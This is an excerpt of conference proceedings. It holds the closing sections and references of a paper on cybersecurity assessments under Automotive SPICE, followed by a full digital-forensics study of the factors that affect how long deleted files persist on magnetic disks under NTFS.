4 Study Results and Final Conclusion The case study and conducted assessments done above has shown that the traditional assessment methodology of A-SPICE and the used assessment tools are hugely impacted by the newly published Automotive SPICE® for Cybersecurity, given the same inputs, and development circumstances. The project assessments generated quite a few lessons learned and updates to both the assessment method and the used assessment tools by the same certified assessment team of the automotive SPICE process model. New gaps in the traditional process assessment tools and methods have been identified in each step of the assessment approach in light of standardizing the Cybersecurity aspects inside the new release of Automotive SPICE process model appendix for Cybersecurity. These new gaps may not have a direct impact on the projects overall compliance (capability level) to Automotive SPICE, however they certainly impact the assessment pre-planning, planning, execution, and post execution phases in terms of time, methodology, and awareness of both the assessed project team as well as the assessment team. The exact percentage of increase in the effort spent on assessments after including the Cybersecurity process group in the plan is a topic that needs to be further addressed and studied by the Automotive SPICE practitioners. Further efforts on automation of the assessment rating recommendations considering the dependencies defined between process groups and processes by the SPICE guidelines is also a topic that has a huge potential for improvement and experimentation inside the Automotive community. The non-embedded community process models such as SSE-CMM still have room for improvement regarding similar topics of automation and efficiency for process appraisals of Cybersecurity development projects and products.
5 Conclusion and Recommendations for Future Work Cybersecurity has become a serious concern in all domains with the evolution of cloud computing. This became especially critical in the automotive industry in the recent years due to the increasing integration of computer software and connectivity in modern vehicles. In this paper, we share our experience of applying the guidance in the newly published Automotive SPICE® process model appendix for Cybersecurity inside real assessments of projects with Cybersecurity component development. The case study introduces an evaluation and extra guidance of lessons learned, tools, and best practices to the A-SPICE process model assessors on how to expand the used traditional assessment techniques to comply with the cybersecurity process purposes, practices, outcomes, or work products as essential inputs in Cybersecurity assessments to be in line with Automotive SPICE® newly releases appendix. This imposes a conclusion of the following: Automotive SPICE process assessments techniques and efficiency are impacted by the newly released standard appendix of Automotive SPICE for Cybersecurity.
654
N. Moselhy and A. A. Mahmoud
The possibility to expand the activities and the used tools within a project process assessment to embrace security engineering process model aspects in both the short and long runs is feasible. A Software project with Cybersecurity constraints needs to integrate a unified solution within an organization for assessments to facilitate efficiency and secure communication with minimal overhead. Future excitements on the assessment time savings need to be conducted. We believe that these experiences and suggestions need to be shared with the Automotive SPICE® to push forward automotive cybersecurity and to improve the standard in the long run.
References 1. VDA-QMC: Qualitats Management Center in Verband der Automobilindustrie. https://vda qmc.de/en/ 2. VDA Automotive SPICE for Cybersecurity, 1st edn., August 2021. https://webshop.vda.de/ QMC/de/automotive-spice-for-cybersecurity_1st-edit-2021 3. Systems Security Engineering — Capability Maturity Model® (SSE-CMM®). https://www. iso.org/standard/44716.html 4. Automotive SPICE® Process Reference Model, Process Assessment Model Version 3.1, 1 November 2017. http://www.automotivespice.com/ 5. Lessons Learned from a Joint CMMI (v1.2) and SSE-CMM (v3.0) Class B SCAMPI Appraisal by the Booz, Allen, & Hamilton organization. https://resources.sei.cmu.edu/asset_files/Presen tation/2008_017_001_23463.pdf 6. ISO27001/2. https://www.iso.org/isoiec-27001-information-security.html 7. CMMI for development V3.1. https://resources.sei.cmu.edu/library/asset-view.cfm?assetid= 9661 8. Sherman, M.S.: Software Engineering Institute “SEI”: “Cybersecurity Considerations for Vehicles” in the “Software Engineering Institute”, December 2015 9. Walton, S., Wheeler, P.R.: An integrative review and analysis of cybersecurity research: current state and future directions. J. Inf. Syst. (2021) 10. Schlager, C., Macher, G.: The cybersecurity extension for ASPICE - a view from ASPICE assessors. In: Yilmaz, M., Clarke, P., Messnarz, R., Reiner, M. (eds.). EuroSPI 2021. CCIS, vol. 1442, pp. 409–422. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-855215_27 11. Moselhy, N., Ali, Y.: Impact of the new A-SPICE Appendix for cybersecurity on the implementation of ISO26262 for functional safety. In: Yilmaz, M., Clarke, P., Messnarz, R., Reiner, M. (eds.) EuroSPI 2021. CCIS, vol. 1442 pp. 122–136. Springer, Cham (2021). https://doi. org/10.1007/978-3-030-85521-5_9 12. ISO26262: ISO - International Organization for Standardization. 26262 Road vehicles Functional Safety Part 1–10 (2011) 13. Pazos-Revilla, M., Siraj, A.: Tools and techniques for SSE-CMM implementation. In: Tennessee Technological University, Department of Computer Science (2008) 14. SOC-CMM - Security Operation Centers, Capability Maturity Model Measurement. https:// www.soc-cmm.com/ 15. This Paper: Standardization of Cybersecurity Concepts in Automotive Process Models: An assessment tool proposal
Standardization of Cybersecurity Concepts in Automotive Process Models
655
16. Magdy, E.: A-SPICE for cybersecurity: analysis and enriched practices. In: Yilmaz, M., Clarke, P., Messnarz, R., Reiner, M. (eds.) EuroSPI 2021. CCIS, vol. 1442, pp. 564–574. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-85521-5_37 17. Stolfa, S., et al.: Automotive cybersecurity manager and engineer skills needs and pilot course implementation. In: Yilmaz, M., Clarke, P., Messnarz, R., Wöran, B. (eds.) EuroSPI 2022. CCIS, vol. 1646, pp. 335–348. Springer, Cham (2022). https://doi.org/10.1007/978-3-03115559-8_24
Factors Affecting the Persistence of Deleted Files on Digital Storage Devices Tahir M. Khan1(B) , James H. Jones Jr.2 , and Alex V. Mbazirra3 1 Purdue University, West Lafayette, IN, USA
[email protected]
2 George Mason University, Fairfax, VA, USA 3 Marymount University, Arlington, VA, USA
Abstract. There is limited research addressing the factors that contribute to the persistence of deleted file contents on digital storage devices. This study presents a digital file persistence methodology applied to study the persistence of deleted files on magnetic disk drives, although the methodology could be applied to other media types as well. The experiments consisted of tracking approximately 1900 deleted files under combinations of different factors over 324 distinct experimental runs. The findings show that the persistence of deleted files depends on several factors, including the number and size of new files written to a disk by the operating system, disk-free space combined with disk fragmentation, and file type. Future work will apply this methodology to broader factors, including other devices and circumstances. Keywords: Digital forensics · Digital file persistence · Digital file persistence factors · Deleted files
1 Introduction Computer technology is becoming more widely adopted and used in the home and workplace. Devices enabled with the latest technology require storage of temporary or long-term files and data in a volatile or non-volatile storage medium. A volatile device, such as random-access memory (RAM), stores temporary data and loses data when power is interrupted or turned off. A nonvolatile device, such as a hard disk drive, stores data that remains intact until the data is deleted from the disk. Business or home users frequently create and delete files. An operating system uses a file system to manage and organize files on a storage medium. The file system is responsible for tracking allocated and unallocated sectors on a magnetic disk drive [1]. The file system divides the storage into clusters, a fixed number of contiguous sectors of a disk volume, and the smallest logical storage unit on a hard drive. All modern file systems allocate one or more clusters to store files on a disk volume [2]. The file system currently uses the allocated sectors and cannot be rewritten with new data. Unallocated sectors, on the other hand, are available for writing new data as needed by the file system. When a user deletes a file from
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 656–673, 2023. https://doi.org/10.1007/978-3-031-28073-3_45
Factors Affecting the Persistence of Deleted Files
657
a magnetic disk drive, the file system marks the cluster unallocated for future use as needed, but without removing the original file data from the disk [3]. The file system simply removes the deleted file’s reference point from the containing directory, and the blocks holding the deleted file contents are now available to the system for storing other files. The file system gradually overwrites the deleted file contents, and some deleted file contents may remain intact on the disk drive for days, months, or even years if the file system does not write new data to an unallocated sector of the disk [4]. This paper discusses the factors that affect the persistence of deleted files on a magnetic disk drive. The motivation for studying the factors affecting the persistence of deleted files stems from previous work completed by Garfinkel and McCarrin [34], which inferred the presence of whole files based on residual fragments, and Jones et al. [32], which inferred past application activity from residual deleted file fragments. The [32] and [34] studies established the value of deleted file fragments, but the motivation for this study is a lack of research into how and why these fragments persist. This paper discusses a methodology for studying the persistence of deleted files on magnetic hard disks and a method for tracking sectors associated with deleted files in sequential disk images taken from a single system over time. The rest of the paper is organized as follows: Sect. 2 describes related work, Sect. 3 presents the experimental setup and design, Sect. 4 discusses the nine factors selected to investigate digital file persistence on magnetic disks, Sect. 5 describes the experimental approach and methodology, Sect. 6 presents the findings and results of this study, Sect. 7 discusses the challenges and limitations, Sect. 8 discusses the study’s conclusion, and Sect. 9 discusses the future work.
2 Related Work Since the innovation of computers, recovering deleted files has been of interest to computer users as well as those investigating computer use and misuse. In 1985, the Ontrack Computer System developed the first recovery tool Disk Manager® [5], and since then, developers have developed many open-source and commercial tools for recovering deleted files. The deleted files can be recovered using professional forensic tools [6] and methods described in [7–10] for recovering deleted data from a system. Data can be recovered from solid-state drives (SSDs) if one of these conditions outlined in [11] are met: 1) The operating system has not issued the TRIM command after the file is deleted from the hard disk. The TRIM command informs the drive that a data block is no longer needed and can be wiped internally [12]. 2) The file system does not support the TRIM command. 3) The file system supports the TRIM command, but the command itself is disabled. Zhang [13] discusses eight factors affecting hard drive data recovery. The author describes a scenario in which large files spread across a large area on the disk will require extensive time reading file contents from the disk platter to recover such deleted files. The data can be recovered from various devices, but there is limited research that explains the factors that contribute to the persistence of deleted files. Lang and Nimsger [14], in Chapter 5 of their book “Electronic Evidence and Discovery,” discuss factors influencing the recovery of deleted files. They observed factors influencing the probability of recovering deleted files, such as how they were deleted, the amount of time passed, computer usage since the deletion, and so on. These factors have been observed but not thoroughly investigated.
658
T. M. Khan et al.
Farmer and Venema discuss the results of a 20-week experiment conducted in a controlled environment to study how long the contents of a deleted file survive on a disk in Chapter 7 of their book “Forensic Discovery.“ The authors recorded each data block daily to develop a timeline for when the file was deleted and overwritten. The experiment shows that half of the deleted file contents were overwritten after about 35 days. Furthermore, the deleted file contents gradually decay over time with the daily user activity. However, the experimental results do not explain the factors affecting the deleted file decay over time. Riden [15] conducted an experiment to determine how long it takes to overwrite a cluster or block in a file system. The files were deleted from a pen drive, and a set of new files were copied to study the persistence of deleted files. The author concludes that file system block decay gradually over time. Venema stated at the fifth annual DFRWS conference [16] that “…the persistence of deleted file content is dependent on the file system, activity, and amount of free space (a complex relationship)”. In 2012, Fairbanks and Garfinkel posited several factors published in [17] that might affect data decay for deleted files. The paper states that “in order to understand and quantify deleted data decays, one must understand file system and user behavior.” From their work, we perceived the idea of studying deleted file decay rates on a magnetic disk. Jones and Khan presented their results in [18] that show the number of new files written on the disk is one of the factors affecting the persistence of deleted files. We used the differential analysis approach [19] to measure deleted files’ persistence. The differential analysis compares images of media at two points in time to derive information about changes from one image to the next, such as a new or deleted file. In 2015, Kevin proposed a method of measuring data persistence using the Ext4 file system journal [20], which is considered an instrumented or log-based approach. This approach uses live recording or written records to track media changes. The Ext4 is a journaling file system primarily used by Linux operating systems. He discusses that data decay rates can be observed with the continuous monitoring of the Ext4 file system journal. The disk reserves a fixed-sized area for the journal where the system writes data first, and then the data is written to the disk. This paper extends the work of [17, 20] and introduces new factors such as disk fragmentation, file types, and file size that have not been studied yet that affect the persistence of deleted files.
3 Experimental Design Figure 1 depicts the experimental setup and design for studying the persistence of deleted files on magnetic hard disk drives using virtual machines (VMs). The file system in the VM is unaware of the underlying physical structure, so the behavior of a VM system and a bare metal system is expected to be the same for this experiment [21]. The experimental design is a four-step process: 1) During the disk parameter adjustment phase, twelve disks were created with the disk specifications listed in Table 1. Each disk contains the operating system and application files required to run the experiment. After successfully creating each VM disk, a snapshot for each VM was created, which serves two purposes [22]. First, it preserves the VM’s state at a specific point-in-time. Second, the user can revert to the point-in-time image whenever necessary. The virtual machine preserving and archiving process section discusses the process of creating and
Factors Affecting the Persistence of Deleted Files
659
Fig. 1. Experimental design
preserving a VM’s state. The approach and methodology section discusses the process of tracking sectors associated with deleted files in sequential disk images taken from a single system over time. 2) During the file creation phase, new files on the system were created by copying files from an external drive, installing applications, and performing various web user activities. 3) During the file deletion phase, the files created in the previous step were deleted from the system. All files created during the file creation phase were not deleted. Only the files of interest (1917 deleted files that were common across all twelve disks) were deleted and tracked throughout the experiment’s lifecycle. 4) During the user activity performing phase, the user activities described in the post-user activity section were performed on each system to determine the effect of these actions on the persistence of deleted files. User activities performed on the system include rebooting, shutting down, copying files to the system, and so on. Before performing each activity, the machine’s state was reverted to its previous state. The process is repeated until all activities are performed, as outlined in Table 2. Following completion of each user activity, the VM files were archived and converted into RAW disk images in order to process disk images. Each user activity was repeated on twelve disks, resulting in 324 runs for this study1 . 3.1 Virtual Machine Preserving and Archiving Process The experimental design requires preserving the state of a virtual machine at a specific point-in-time. Figure 2 shows the process of preserving and archiving virtual machines. A virtual machine is composed of several files, including the virtual machine disk (VMDK), virtual machine configuration (VMX), virtual machine snapshot (VMS), virtual memory (VMEM), virtual machine suspended state (VMSS), and log files. The VMDK file contains operating system files, user files, and application files, and it has properties similar to a physical hard disk [23]. A user creates and deletes files from the VMDK file. The machine was suspended to preserve the state of a virtual machine at a specific point in time. A snapshot was taken for each virtual machine at each phase depicted in Fig. 1, and files associated with each virtual machine described above were 1 Twelve disks, nine user activities, and three repeated experiments (12 * 9 * 3 = 324).
660
T. M. Khan et al.
Fig. 2. Virtual machine file archive and conversion process
copied to a separate folder while it was suspended. The raw disk image format is a bit-for-bit copy of the virtual machine disk [24] and is used for processing deleted files. The Linux utility Quick Emulator (QEMU) was used to convert the VM disk to a raw disk image using the following command: qemu-img convert –f vmdk virtual-disk.vmdk disk.img [25]
4 Parameters Identification In this study, nine factors were selected to investigate digital file persistence on magnetic disks, which were divided into three categories: disk and system, deleted files, and post-user activity profile. Each category is discussed in more detail in the sections that follow. 4.1 Disk and System Factors Factors associated with the disk and system include the disk-free bytes (media free space), disk fragmentation, media type, and file system. The media free space is the amount of disk space available for an operating system to write new files on the disk. The disk fragmentation measures how far the deleted files are scattered on a disk. Large areas of contiguous disk-free space are available for writing new files on a low-fragmented disk. In contrast, small areas of contiguous free space are available on a high-fragmented disk. The media type is the magnetic disk that reads, writes, and accesses data from a disk platter. An operating system uses a file system to organize data on a system. Many file systems are used in modern operating systems, including FAT32, NTFS, EXT4, and others. The file system selected for this study is New Technology File System (NTFS) which Microsoft Windows uses in its current operating systems. The goal of creating a unique combination of disks is to study the persistence of deleted files under varying disk conditions, as shown in Table 1. The disk-free bytes range from 4.27 gigabytes (GB) to 23.78 GB, with disk fragmentation ranging from 1% to 22%.
Factors Affecting the Persistence of Deleted Files
661
Table 1. Disk combinations Disk-free bytes (GB)
Disk fragmentation (Percent)
4.27
16
4.28
3
4.28
22
9.72
13
9.73
20
9.74
1
13.09
3
13.11
12
13.12
21
23.78
3
23.78
14
23.78
21
4.2 Post-user Activity Figure 1 shows that files of interest (1917 deleted files that were common across all twelve disks) were deleted during the file deletion phase. These files were tracked throughout the experiment’s lifecycle. Following the deletion of files from the system, nine post-user activities, summarized in Table 2, were performed to determine whether these activities affected the persistence of deleted files. Each user activity generated a distinct set of files on the system. Table 3 shows the number of new files and total file size in bytes that each activity writes on the system. In this experiment, each user activity was repeated three times on twelve different disks. Table 3 shows the minimum and the maximum number of new files created while performing each user activity listed in Table 2. 4.3 Deleted Files Properties We chose several deleted file properties to investigate how they affect the persistence of deleted files, including file size, file extension, file path, non-resident, and nonfragmented. The file size is the size of the deleted file. A file extension is a suffix added to the end of a filename. It is frequently followed by three characters identifying the file format in a Microsoft Windows operating system. A file path describes the location of a file on the disk. The non-resident files have a file size above 700 bytes and are always stored outside of the Master File Table (MFT) of the Microsoft Windows operating system [26]. In a magnetic disk, a disk platter is located inside the hard disk drive (HDD) that holds the actual data [27]. A disk platter is divided into tracks and sectors. An HDD may contain multiple platters; each platter can have thousands of tracks, further divided into sectors. A sector is the smallest readable or writable data storage unit on an HDD.
662
T. M. Khan et al. Table 2. User activity name and description
Activity name
Activity action
Reboot
The system is rebooted one time
One-hour-reboot
The system runs for one hour without any user interaction. During this period, the system is configured to not go into sleep mode. After one hour, the user reboots the host system
Reboot-one-hour
The user reboots the system; after a successful reboot, the system runs for one hour without user intervention. While the system was running for one hour, the user performed no activities on the system. During this period, the system does not go into sleep mode
Reboot-three-times The system was restarted three times. Following the completion of the first reboot, a second reboot was initiated, followed by a third reboot. Between reboots, we waited three minutes Shutdown
The system is shut down
3-GB-data
The 3.04 GB (3,267,248,128 bytes) of data, which included 494 files, was copied to the system
Experiment-data
The 356 MB (374,091,776 bytes) of data, which included 2,197 files, was copied to the system
Mix-data
The 1.85 GB (1,987,305,472 bytes) of data, which included 11,466 files, was copied to the system
Web
The Mozilla Firefox web browser is used for opening multiple websites. Each website was opened in a new tab; once all websites were open, each tab was closed separately
Table 3. Total bytes each user activity writes on the system User activity name
Minimum new files (Bytes)
Maximum new files (Bytes)
Shutdown
3 (860228)
14 (970572)
One-hour-reboot
5 (9217008)
178 (10239169)
Reboot
7 (9357348)
45 (10263094)
Reboot-one-hour
10 (9350928)
139 (84762146)
Reboot-three-times
10 (9346207)
49 (18777878)
3-GB-data
530 (3267377361)
559 (3274635355)
Web
1010 (31141310)
1049 (22117598)
Experiment-data
2228 (291117530)
2380 (374261303)
Mix-data
12826 (1972078519)
12892 (1979954467)
Factors Affecting the Persistence of Deleted Files
663
Typically, legacy HDDs have a sector size of 512 bytes, while modern drives have a sector size of 4096 bytes [28]. On a magnetic disk, the NTFS divides the storage into clusters which are a fixed number of contiguous sectors of a disk volume and are the smallest logical storage unit on a hard drive. All modern file systems allocate one or more clusters to store data on a disk volume. Non-fragmented files are stored on a disk in consecutive sectors or clusters [29].
5 Approach and Methodology The approach and methodology used for studying the persistence of deleted files were published by Jones and Khan [18]. Figure 3 shows the process of tracking sectors associated with deleted files in sequential disk images taken from a single system over time. The virtual machine snapshots are created at each phase to preserve the state of the virtual machine disk. After successfully taking the snapshot, the virtual machine files must be archived and converted into a raw disk image for processing and tracking data in disk images. The process of archiving and converting a disk to a raw disk image is discussed in the virtual machine preserving and archiving process section.
Fig. 3. Process of tracking deleted file in a single system
Figure 3 shows four disk images taken from a single system over time. The system time is moving from left to right. At each phase, a snapshot is created to preserve the machine’s state. At system t0 , a base image is created, and the raw disk image name is image0 , which contains Microsoft Windows 10 operating system files and applications to run the experiment. We used VMware Workstation version 11.1.2 build-2780323 for creating virtual machines (VMs). The disk space is allocated as fixed, and each disk is stored as a single monolithic file. At or before the system t0 , disk parameters are adjusted for each disk outlined in the disk and system factors section. After adjusting disk parameters, the files of interest were created between disk image0 and image1 . New files are created using various methods, such as by installing, using, and closing applications to generate unique system and log files that the operating system uses for recording and maintaining the internal operation of the system and copying files to the system. Files created in disk image1 were deleted from disk image2 . Only the files of interest tracked in the lifecycle of the experiments were deleted from disk image2 . The post-user activities
664
T. M. Khan et al.
outlined in Table 2 were performed separately on each disk image. To track sectors associated with deleted files, we must know which files were deleted between image1 and image2 . We used the differential analysis approach to derive information about deleted files between image1 and image2 . The differential image analysis approach was proposed by Garfinkel, Nelson, and Young, summarized as a data science tool by Jones [30], and used by Laamanen and Nelson [31] and others [32] for forensic artifact catalog building, and by Nelson [33] to extract software signatures from Windows Registry files. The differential analysis compares images of media at two points in time to derive information about changes from one image to the next, such as a new or deleted file. This study used this approach to identify changes to specific media sectors associated with deleted files. In the differential analysis, the deleted files are identified by comparing the allocated files in image1 and image2 . We used idifference2.py (part of the DFXML package2 ) to identify files deleted between images1 and image2 for each experiment shown in Fig. 3. A file is considered a deleted file if allocated in image1 and not in image2 . The comparison of disk images produces a DFXML file which includes the attributes of new, deleted, and modified files. In this research, the deleted file information is study of the interest, which includes the file name, file status (non-resident file), and the clusters allocated to the file in image1 . We developed two Python scripts, adiff.py and trace_file.py, for processing and recording the persistence of deleted files. The implementation of these scripts is published in [18].
6 Results and Analysis All experiments were carried out in a controlled environment to investigate the persistence of deleted files on a magnetic disk drive. This study included one dependent and nine independent variables to identify patterns of overwriting deleted files in the Microsoft Windows host system. The dependent variable is the persistence of deleted files, and the nine independent variables are post-user activities, disk-free bytes (media free space), disk fragmentation, file system, new files written to disk by the operating system, deleted file size, file path, non-resident, and non-fragmented files. Multiple disk images were created with a unique combination of disk-free space and disk fragmentation to investigate deleted file persistence, as shown in Table 1. We used idifference2.py to identify files deleted between image1 and image2 for each experiment shown in Fig. 3; the 1,902 files were common across all experimental runs. The same 1,902 files were created and deleted on each image using a combination of direct copy and manual delete, application installation and deletion, and native system activity. Nine post-user actions were performed on each image to investigate the factors that may influence the persistence of deleted files, including writing different sizes and numbers of files to disk as well as multiple shutdowns, reboots, and periods of no user activity (as shown in Table 2). Each experimental run was repeated three times, resulting in 324 experiments3 tracking 1,902 files for 616,248 data records (324 * 1902). 2 https://github.com/simsong/dfxml. 3 Twelve disks, nine user activities, and three repeated experiments (12 * 9 * 3 = 324).
Factors Affecting the Persistence of Deleted Files
665
6.1 User Activity and Number of Files In this paper, a user activity is defined as a user’s action on a host system. Rebooting a system is an example of user activity. Table 4 shows the post-user activities conducted to investigate the effects on the persistence of deleted files on magnetic disks, the average number of new files created by each activity, and the deleted files that persist following each user activity. The post-user activities are discussed in the post-user activity section. Table 4. Persistence of deleted files in various user activities User activity name Shutdown (S)
Avg. number of new files written to a host system
Avg. final file persistence (Percent)
7.3
96.26
Reboot (R)
22.5
95.39
Reboot-three-times (RTT)
35.5
94.18
One-hour-reboot (OHR)
81.4
90.80
Reboot-one-hour (ROH)
55.9
90.62
3-GB (3G)
542.3
86.36
Web (W)
1189.2
62.28
Experiment-data (ED)
2305.5
37.23
12846.4
12.72
Mix-data (MD)
Our experiments show that shutdown and reboot user activities generate 7 to 23 files and writing these files to the system overwrites 4 to 5% of the file contents. On the other hand, the mix-data user activity creates an average of 12846.4 files, which overwrites approximately 87% of the file contents. We measured the number of new files written during each activity shown in Table 4. In the experiment, there were 80 distinct values for the number of new files written, ranging from three files to 12,892 files per activity, and each of these values had at least 5,000 occurrences in the dataset. The x-axis represents the number of new files created by each activity; the y-axis represents the average final file persistence, which is the average of all data records (deleted files) in the dataset. Figure 4 shows that the persistence of deleted files decreases as the operating system writes more files to the host system. The result shows that as more files are written to the disk, the sectors of previously deleted files are more likely to be overwritten. The result suggests that the persistence of deleted files is affected by the number of new files written on a host system. 6.2 File Size Table 4 shows the number of new files written but does not indicate the size of each file that the operating system writes to the disk. This section discusses the impact of writing different sizes of new files created during each post-user activity to measure how these
666
T. M. Khan et al.
Fig. 4. The Impact of writing different number of files on the disk
files affect the deleted files tracked in our study. Table 5 shows the post-user activities performed and the data that each activity writes to the system. When the system was shut down, for example, the experiment indicates that approximately 0.60 MB of data was generated, and files ranging in size from 0.01 MB to 0.686 MB were created, which had an impact on the persistence of deleted files. Table 5 shows that when a user performs an activity that requires minimal interaction with the system, such as restarting or shutting down the system, 90 to 96% of deleted files remain intact on the system. Table 5. Impact of writing new files of different sizes on deleted files User activity name Shutdown (S) Reboot (R)
Total data size (MB) 0.60
Avg. final file persistence (Percent)
0.01–0.686
96.3
0.000002–16
95.4
9.14
0.000000954–8
94.2
One-hour-reboot (OHR)
50.31
0.000001–100
90.6
Reboot-one-hour (ROH)
31.58
0.000002–54.44
90.8
0.0000248–2724.95
86.4
0.00000191–1
62.3
0.000000954–39.92
37.2
0.000000954–200
12.7
Reboot-three-times (RTT)
3-GB (3G) Web (W)
14.59
File size range (MB)
3122.09 28.50
Experiment-data (ED)
332.54
Mix-data (MD)
1882.10
The web (W) activity writes approximately 28.50 MB of data to the system, as shown in Table 5. All files included in this activity are smaller than 1 MB in size. Figure 5 plots 108 distinct sizes of files, ranging from 0.00000191 MB to 1 MB. The x-axis represents
Factors Affecting the Persistence of Deleted Files
667
the deleted file sizes, ranging from 0.00098 MB to 55 MB; the y-axis represents the average persistence of deleted files. When files smaller than 1 MB are written to the system, the results indicate that the system had overwritten files smaller than 15 MB in size, and the remaining files remained intact on the system. The result of this activity indicates that writing a small-sized file will possibly overwrite a similar-sized file on the system.
Fig. 5. The impact of web user activity on deleted files
The 3G user activity writes approximately 3122.09 MB of data; among all user activities, this activity writes the most bytes to the system. This activity creates files ranging in size from 0.0000248 MB to 2724.95 MB, including one file of 2750 MB. Figure 6 shows that this activity overwrote files that were not overwritten by the web (W) user activity. This activity includes small and large-sized files that had overwritten files of all sizes on the system. The analysis of web (W) and 3 GB user activities indicates that writing smallsized files will possibly use unallocated sectors previously allocated to small-sized files. Similarly, large-sized files will possibly re-use some of the unallocated sectors previously assigned to large-sized files.
Fig. 6. The impact of 3-GB user activity on deleted files
The shutdown user activity generated the least amount of data on the host system, while the mix-data user activity generated the most. The mix-data user activity has the lowest file persistence among all user activities. In contrast, the shutdown user activity has the highest, implying that different user activities significantly impact the persistence of deleted files.
668
T. M. Khan et al.
6.3 File Types In the dataset, three types of files were created: user files, application files, and system files. User files were created by copying files to the system, application files were created during application installation or usage, and the operating system created system files to track its internal activities. As noted earlier, the persistence of deleted files depends on the file size that the operating system writes. Figure 7 plots the persistence of file types with similar sizes. Application and user-generated files are differentiated with different color dots; blue dots represent application files, and red dots represent user-generated files. There were 56 distinct file size values for application and user-generated files in the experiment; file sizes ranged from 0.00098 MB to 0.627 MB. The x-axis represents deleted file size in MB, and the y-axis represents the average deleted files persistence. The dataset contained only five system files, four of which were 0.00195 MB in size and one 0.00098 MB. The system files had only two distinct file sizes, and these files were excluded from our analysis. Future research will examine system files. Analysis of application and user-generated files indicates that user-generated files persist longer than application-generated files, implying that the type of file impacts the persistence of deleted files.
Fig. 7. Persistence of file types
6.4 Media Free Space and Disk Fragmentation Two properties, disk-free space and disk fragmentation, were studied to investigate how deleted files persist in varying disk conditions, and the results are shown in Table 6. Twelve disks were created, with disk-free bytes ranging from 4.28 GB to 23.78 GB and
Factors Affecting the Persistence of Deleted Files
669
disk fragmentation ranging from 1 to 22%. Each disk combination group is analyzed separately to study the effect of disk fragmentation on deleted files. Table 6 shows that when disks have free space below 5 GB, their average file persistence difference ranges from 2.74 to 5.72%. For example, the average file persistence is 71.31% for the disk, which has a disk-free space of 4.28 GB and is fragmented at 3%. The average file persistence is 74.05% for the disk, which has a disk-free space of 4.27 GB and is fragmented at 16%. The average difference between both disks is 2.74%. For disks with free space above 5 GB, the difference in their persistence is between 0.06% and 1.04%. This indicates that disk fragmentation has minimal impact on the persistence of deleted files as disk-free space increases. It is also observed that disks that were fragmented at the lowest level for a group will overwrite more files than a higher fragmented disk. Table 6. Combinations of disk-free space and disk fragmentation Disk free bytes (GB)
Disk fragmentation (Percent)
Avg. final file persistence (Percent)
4.28
3
71.31
4.27
16
74.05
4.28
22
77.03
9.74
1
74.94
9.72
13
75.02
9.73
20
74.77
13.09
3
72.89
13.11
12
73.24
13.12
21
73.88
23.78
3
72.87
23.78
14
73.85
23.78
21
73.91
Figure 8 is plotted using the data from Table 6. The x-axis represents disk-free bytes in gigabytes, and the y-axis represents disk fragmentation percentage. Each circle on the graph represents the average persistence of deleted files. The circle sizes are relative to each other. We observed that disk fragmentation significantly impacts deleted files for disks with free space of less than 5 GB. The first three disks, two 4.28 GB disks and one 4.27 GB disk, were fragmented at 3%, 16%, and 22%, respectively. The average persistence for deleted files is low for the disk fragmented at 3 %compared to the disk at 22%. This indicates that if disks have free space of less than 5 GB and disks are fragmented differently, a higher fragmented disk will overwrite less file content than a lower fragmented disk.
670
T. M. Khan et al.
Fig. 8. Effect of disk fragmentation on deleted files
7 Challenges and Limitations The differential forensic analysis approach can be used in various use cases, including malware discovery and analysis, insider threat identification, the pattern of life analysis [19], and other situations requiring the identification of differences between two or more disk images. A malware analyst can infer malware behavior in a malware discovery and analysis use case by comparing two disk images, the first taken before the malware was introduced on a system and the second after the malware had infected the system. The differential analysis approach requires at least two disk objects, a baseline, and a final image. A baseline is the first disk image taken before an incident occurs at a specific time, and a final image is the last image taken in a use-case scenario. Zero or more intermediary disk images can be taken between the baseline and final images. The approach requires a common baseline for all disk images, such as baseline, intermediary, and final images. The limitation of this approach is that a first baseline image must be captured before an incident occurs on a system. The approach cannot be used to determine an incident’s before and after effects if a baseline image is not taken prior to the incident.
8 Conclusion In this paper, we studied several factors that affect deleted file persistence on magnetic disks. The experiments were conducted in a controlled environment. The results indicate that the persistence of a digital file is dependent on various factors, including the type of file, the size of new files that an operating system writes to the disk, and disk condition, which includes the amount of free space and disk fragmentation percentage at a given point in time. The result suggests that the persistence of deleted files is affected by the number of new files written on a host system. When a user performs an activity that requires minimal interaction with the system, such as restarting or shutting down the system, 90 to 96% of deleted files remain intact on the system. Writing a small file will possibly overwrite a similar-sized deleted file on the system. Similarly, large-sized files will possibly re-use some of the unallocated sectors previously assigned to large-sized
Factors Affecting the Persistence of Deleted Files
671
files. Analysis of application and user-generated files indicates that user-generated files persist longer than application-generated files, implying that the type of file impacts the persistence of deleted files. It is also observed that disks that were fragmented at the lowest level for a group will overwrite more files than a higher fragmented disk. These findings inspire further investigation into the persistence of deleted files in other file systems and devices.
9 Future Work The persistence of deleted files is studied on a Microsoft Windows 10 operating system. This approach can be further applied to the Linux and Macintosh operating systems to investigate the underlying structure of operating systems to identify factors that may impact deleted files. This study focused on non-resident and non-fragmented files. Future work may include studying the persistence of deleted files, including resident files, fragmented files, and system files that an operating system creates to track its internal activities.
